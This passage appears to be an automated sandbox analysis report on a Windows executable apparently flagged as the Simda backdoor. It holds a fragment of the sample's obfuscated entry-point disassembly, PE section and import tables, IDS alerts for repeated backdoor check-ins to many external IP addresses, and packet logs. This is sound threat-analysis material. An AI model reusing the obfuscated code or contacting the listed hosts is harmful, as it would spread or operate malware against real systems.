                                                                                                                                                                                                            mov ebx, 00214203h
                                                                                                                                                                                                            add ebx, 00229C1Fh
                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                            mov dword ptr [0043E0FDh], 00000000h
                                                                                                                                                                                                            mov edx, dword ptr [0043E0FDh]
                                                                                                                                                                                                            push edx
                                                                                                                                                                                                            call dword ptr [004260E0h]
                                                                                                                                                                                                            mov dword ptr [0043D478h], eax
                                                                                                                                                                                                            mov dword ptr [0043E0C9h], 000086A2h
                                                                                                                                                                                                            mov eax, dword ptr [0043E0C9h]
                                                                                                                                                                                                            push 00000E1Eh
                                                                                                                                                                                                            pop edx
                                                                                                                                                                                                            shr edx, 06h
                                                                                                                                                                                                            dec edx
                                                                                                                                                                                                            rol edx, 05h
                                                                                                                                                                                                            sub edx, dword ptr [0043DA4Eh]
                                                                                                                                                                                                            sub edx, eax
                                                                                                                                                                                                            mov ebx, edx
                                                                                                                                                                                                            add ebx, dword ptr [0043E424h]
                                                                                                                                                                                                            inc ebx
                                                                                                                                                                                                            shl ebx, 1
                                                                                                                                                                                                            add dword ptr [0043D75Eh], ebx
                                                                                                                                                                                                            call 00007F79587D3DE2h
                                                                                                                                                                                                            mov dword ptr [0043D653h], eax
                                                                                                                                                                                                            mov edx, 002728E2h
                                                                                                                                                                                                            add edx, 001CA88Dh
                                                                                                                                                                                                            push edx
                                                                                                                                                                                                            mov ecx, 003F5ECEh
                                                                                                                                                                                                            mov ebp, ecx
                                                                                                                                                                                                            mov edi, 00047C6Dh
                                                                                                                                                                                                            add ebp, edi
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            push 0014ADBCh
                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                            mov dword ptr [0043D7C8h], 002F2F1Eh
                                                                                                                                                                                                            add esi, dword ptr [0043D7C8h]

                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x261d40xb4.fwQO
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x2a048.rsrc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x940000x4aa.reloc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x383dc0x1c.D
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                            Sections

                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                            .text0x10000x2fd90x3000d73d0e281626fbb3ecec77d2e8aa1769False0.7303059895833334COM executable for DOS6.420148786453065IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .dHGmL0x40000x733d0x600146ba48b12ddc4d87c37c42526e6cd84False0.181640625Matlab v4 mat-file (little endian) \333_^\020U, numeric, rows 0, columns 01.4859327833763099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .lzmjSu0xc0000xc1af0x20061af0c0d83c1325686ba8762e3e8d981False0.40234375data2.787352355338978IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .YOSWO0x190000x4ff90x6008f3ef2f627573ad2dcb3e05b99ae413bFalse0.5924479166666666data4.742875837921052IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .sTDEgl0x1e0000x74430x8003a8e8bd0335dc84a50fc5c79b67c3d0aFalse0.60009765625data5.035390472599325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .fwQO0x260000x797a0xe00e879e25bdf58f45d60295218e86bc236False0.4361049107142857data4.86580950341829IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .L0x2e0000x978e0x200010aea57b2cd53e20b70dee59aedc905False0.640625data4.558249274598118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .D0x380000x401a0x600c2b33e6b4777caf26721728b1213be8bFalse0.57421875data4.666855552838835IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .data0x3d0000x26910x2800f66ee5f77d63a2d0f55a13b4aab8b246False0.84580078125data7.005203294431193IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .kubC0x400000x616d0x4000fc3d2bf5e87a10e3ed265156ec1b7b7False0.2353515625Matlab v4 mat-file (little endian) \316, numeric, rows 0, columns 01.822118650991909IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .hkw0x470000x21b590x6001427a6ec5060bd3a64df6cc9b4758b57False0.15494791666666666data1.2660415037779147IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .rsrc0x690000x2a0480x2a2005363093beaf747e12444bb8e872dcf11False0.9833028097181009data7.981989177826033IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                            .reloc0x940000x4aa0x6006af87ce341dd6bf5cc992452b47fea53False0.7565104166666666data6.20097753724165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                            Resources

                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                            RT_ICON0x691780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.41627579737335835
                                                                                                                                                                                                            RT_DIALOG0x6a2200x3adataEnglishUnited States0.9827586206896551
                                                                                                                                                                                                            RT_RCDATA0x6a25c0x28b94dataEnglishUnited States1.0003656986643006
                                                                                                                                                                                                            RT_GROUP_ICON0x92df00x14dataEnglishUnited States1.1
                                                                                                                                                                                                            RT_VERSION0x92e040x244dataEnglishUnited States0.5431034482758621

                                                                                                                                                                                                            Imports

                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                            KERNEL32.DLLDosDateTimeToFileTime, GetSystemDirectoryW, WriteFile, GetProcAddress, CreateFileA, GetModuleHandleA, CreateDirectoryA, FileTimeToSystemTime, IsBadStringPtrA, GetSystemDirectoryA, GetTimeFormatA, lstrcpyn, LocalAlloc, OpenWaitableTimerA, EnumCalendarInfoA, GetNamedPipeInfo, IsValidCodePage
                                                                                                                                                                                                            USER32.DLLEnumChildWindows, GetSysColor, DialogBoxParamA, CreateMenu, EnumDesktopsA, GetClassNameA, CharNextA, ReleaseDC, RegisterWindowMessageA, EnumWindows, InvalidateRgn, SetWindowLongA, ShowCursor, CreateAcceleratorTableW, GetCaretPos, SetFocus, UnregisterClassW, PeekMessageW, SetMenu, GetMenuItemInfoA, LoadImageA, SendMessageW, DialogBoxIndirectParamA, CopyRect, GetWindowRect, GetScrollPos, CopyImage, GetSysColorBrush, PostQuitMessage, CheckDlgButton, GetDC, IsWindowEnabled, FillRect, CharLowerA, CreateDesktopA, UpdateWindow, SetCapture, SendDlgItemMessageW, LoadBitmapW, CreateWindowExW, GetDlgItemTextA, DefDlgProcA, GetKeyboardType, DefWindowProcW, CloseWindow, DestroyIcon, SetActiveWindow, CharUpperW
                                                                                                                                                                                                            gdi32.dllGetPixelFormat, GetMetaRgn, GetEnhMetaFilePaletteEntries, GetWorldTransform, GetTextExtentExPointA, GetPath, GetLogColorSpaceW
                                                                                                                                                                                                            advapi32.dllRegOpenKeyExA, RegCreateKeyExW, RegCloseKey, RegDeleteValueW, RegReplaceKeyA, RegEnumValueA
                                                                                                                                                                                                            shell32.dllStrCmpNIA, StrRStrA, StrStrIA
                                                                                                                                                                                                            WINSPOOL.DRVEnumPrinterDataA, AddPortW, DocumentPropertiesW, GetJobA, ConfigurePortA, AddMonitorA, EnumPrinterKeyA, EndPagePrinter, DocumentPropertySheets
                                                                                                                                                                                                            INETCOMM.DLLMimeOleConvertEnrichedToHTML, MimeOleSMimeCapInit, MimeOleGetBodyPropW, MimeEditViewSource, DllGetClassObject, MimeOleCreateMessageParts, MimeOleCreateBody, HrGetDisplayNameWithSizeForFile, CreateIMAPTransport, HrFreeAttachData, HrGetLastOpenFileDirectoryW, MimeOleGetCodePageCharset, MimeEditDocumentFromStream
                                                                                                                                                                                                            CRYPT32.DLLCryptSignCertificate, CertCreateCRLContext, CryptMsgOpenToDecode, CertIsValidCRLForCertificate, CryptGetOIDFunctionAddress, CertAddEncodedCertificateToStore

                                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                            2024-11-11T18:24:29.542828+01002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.1064434UDP
                                                                                                                                                                                                            2024-11-11T18:24:29.656338+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.104972318.208.156.24880TCP
                                                                                                                                                                                                            2024-11-11T18:24:29.661302+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.1049723TCP
                                                                                                                                                                                                            2024-11-11T18:24:29.661302+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.1049723TCP
                                                                                                                                                                                                            2024-11-11T18:24:29.924269+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1049724199.59.243.22780TCP
                                                                                                                                                                                                            2024-11-11T18:24:29.956188+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.10497253.94.10.3480TCP
                                                                                                                                                                                                            2024-11-11T18:24:29.964042+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.1049725TCP
                                                                                                                                                                                                            2024-11-11T18:24:29.964042+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.1049725TCP
                                                                                                                                                                                                            2024-11-11T18:24:30.172576+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.104972723.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:24:30.235862+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.104972899.83.170.380TCP
                                                                                                                                                                                                            2024-11-11T18:24:30.252508+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1049726188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:24:30.455126+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.104973544.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:24:30.468239+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1049734208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:24:30.492705+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.104973644.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:24:30.499898+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.1049736TCP
                                                                                                                                                                                                            2024-11-11T18:24:30.499898+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.1049736TCP
                                                                                                                                                                                                            2024-11-11T18:24:30.572465+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1049734208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:24:30.884282+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.104973823.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:24:31.271136+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.104973999.83.170.3443TCP
                                                                                                                                                                                                            2024-11-11T18:24:31.354863+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1049741154.212.231.8280TCP
                                                                                                                                                                                                            2024-11-11T18:24:31.619135+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1049737199.191.50.8380TCP
                                                                                                                                                                                                            2024-11-11T18:24:31.721361+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1049741154.212.231.8280TCP
                                                                                                                                                                                                            2024-11-11T18:24:31.878427+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1049740188.114.96.3443TCP
                                                                                                                                                                                                            2024-11-11T18:24:32.263879+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1049726188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:24:33.756133+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1049761188.114.96.3443TCP
                                                                                                                                                                                                            2024-11-11T18:24:40.920775+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.1049807TCP
                                                                                                                                                                                                            2024-11-11T18:25:01.551897+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1049747178.162.203.20280TCP
                                                                                                                                                                                                            2024-11-11T18:25:10.006115+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1049974178.162.203.20280TCP
                                                                                                                                                                                                            2024-11-11T18:25:10.468485+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.104999413.248.169.4880TCP
                                                                                                                                                                                                            2024-11-11T18:25:10.752110+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106405318.208.156.24880TCP
                                                                                                                                                                                                            2024-11-11T18:25:10.778434+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.10640543.94.10.3480TCP
                                                                                                                                                                                                            2024-11-11T18:25:10.891885+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064052188.114.97.380TCP
                                                                                                                                                                                                            2024-11-11T18:25:11.599597+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064055103.150.10.4880TCP
                                                                                                                                                                                                            2024-11-11T18:25:12.707263+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064055103.150.10.4880TCP
                                                                                                                                                                                                            2024-11-11T18:25:14.399690+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064056188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-11T18:25:14.823138+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064052188.114.97.380TCP
                                                                                                                                                                                                            2024-11-11T18:25:16.983038+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064058188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-11T18:25:17.820751+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106405976.223.67.18980TCP
                                                                                                                                                                                                            2024-11-11T18:25:17.942769+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064060103.224.212.21080TCP
                                                                                                                                                                                                            2024-11-11T18:25:18.030999+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064061103.224.182.25280TCP
                                                                                                                                                                                                            2024-11-11T18:25:18.054302+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106406444.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:25:18.068366+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106406264.225.91.7380TCP
                                                                                                                                                                                                            2024-11-11T18:25:18.434038+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064063154.85.183.5080TCP
                                                                                                                                                                                                            2024-11-11T18:25:18.728763+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064063154.85.183.5080TCP
                                                                                                                                                                                                            2024-11-11T18:25:18.978992+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.1064065TCP
                                                                                                                                                                                                            2024-11-11T18:25:20.420375+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106237364.225.91.7380TCP
                                                                                                                                                                                                            2024-11-11T18:25:20.659044+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106130072.52.179.17480TCP
                                                                                                                                                                                                            2024-11-11T18:25:22.090869+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106130172.52.179.17480TCP
                                                                                                                                                                                                            2024-11-11T18:25:25.491907+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.105797452.34.198.22980TCP
                                                                                                                                                                                                            2024-11-11T18:25:25.507333+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz152.34.198.22980192.168.2.1057974TCP
                                                                                                                                                                                                            2024-11-11T18:25:25.507333+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst152.34.198.22980192.168.2.1057974TCP
                                                                                                                                                                                                            2024-11-11T18:25:28.402460+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.105748144.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:25:29.986729+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062042199.59.243.22780TCP
                                                                                                                                                                                                            2024-11-11T18:25:30.016943+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106204323.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:25:30.024856+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062044208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:25:30.172771+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106204799.83.170.380TCP
                                                                                                                                                                                                            2024-11-11T18:25:30.376055+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062044208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:25:30.465143+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062045154.212.231.8280TCP
                                                                                                                                                                                                            2024-11-11T18:25:30.544301+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062046188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:25:30.773879+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106204823.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:25:30.840579+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062045154.212.231.8280TCP
                                                                                                                                                                                                            2024-11-11T18:25:31.135013+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106204999.83.170.3443TCP
                                                                                                                                                                                                            2024-11-11T18:25:31.798675+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062050188.114.96.3443TCP
                                                                                                                                                                                                            2024-11-11T18:25:32.206033+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062046188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:25:33.653749+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062051188.114.96.3443TCP
                                                                                                                                                                                                            2024-11-11T18:25:37.542456+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062041178.162.203.20280TCP
                                                                                                                                                                                                            2024-11-11T18:25:49.893635+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062052178.162.203.20280TCP
                                                                                                                                                                                                            2024-11-11T18:25:54.210999+01002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.1054457UDP

                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.215507030 CET4972380192.168.2.1018.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.220464945 CET804972318.208.156.248192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.220563889 CET4972380192.168.2.1018.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.220968962 CET4972380192.168.2.1018.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.228363037 CET804972318.208.156.248192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.494201899 CET4972480192.168.2.10199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.499025106 CET8049724199.59.243.227192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.499094009 CET4972480192.168.2.10199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.502762079 CET4972580192.168.2.103.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.502866983 CET4972480192.168.2.10199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.507038116 CET4972680192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.507564068 CET80497253.94.10.34192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.507890940 CET8049724199.59.243.227192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.507977009 CET4972580192.168.2.103.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.511807919 CET4972580192.168.2.103.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.511888027 CET8049726188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.511941910 CET4972680192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.512022972 CET4972680192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.516616106 CET80497253.94.10.34192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.516794920 CET8049726188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.653403997 CET804972318.208.156.248192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.656337976 CET4972380192.168.2.1018.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.661302090 CET804972318.208.156.248192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.664329052 CET4972380192.168.2.1018.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.711606026 CET4972780192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.716100931 CET4972380192.168.2.1018.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.716434002 CET804972723.253.46.64192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.716520071 CET4972780192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.717277050 CET4972780192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.720953941 CET804972318.208.156.248192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.722064018 CET804972723.253.46.64192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.805135012 CET4972880192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.810205936 CET804972899.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.810549974 CET4972880192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.811451912 CET4972880192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.816612005 CET804972899.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.924185991 CET8049724199.59.243.227192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.924268961 CET4972480192.168.2.10199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.924381018 CET8049724199.59.243.227192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.924459934 CET4972480192.168.2.10199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.956121922 CET80497253.94.10.34192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.956187963 CET4972580192.168.2.103.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.964041948 CET80497253.94.10.34192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.964098930 CET4972580192.168.2.103.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.975807905 CET4972580192.168.2.103.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.980803013 CET80497253.94.10.34192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.018305063 CET4973480192.168.2.10208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.023228884 CET8049734208.100.26.245192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.023629904 CET4973480192.168.2.10208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.024002075 CET4973580192.168.2.1044.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.024241924 CET4973480192.168.2.10208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.028840065 CET804973544.221.84.105192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.029006004 CET4973580192.168.2.1044.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.029042959 CET8049734208.100.26.245192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.029185057 CET4973580192.168.2.1044.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.034032106 CET804973544.221.84.105192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.059093952 CET4973680192.168.2.1044.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.064888000 CET804973644.221.84.105192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.064954042 CET4973680192.168.2.1044.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.065094948 CET4973680192.168.2.1044.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.071204901 CET804973644.221.84.105192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.092843056 CET4973780192.168.2.10199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.098643064 CET8049737199.191.50.83192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.098742008 CET4973780192.168.2.10199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.098906040 CET4973780192.168.2.10199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.103705883 CET8049737199.191.50.83192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.172508001 CET804972723.253.46.64192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.172575951 CET804972723.253.46.64192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.172575951 CET4972780192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.172614098 CET4972780192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.173686028 CET4972780192.168.2.1023.253.46.64
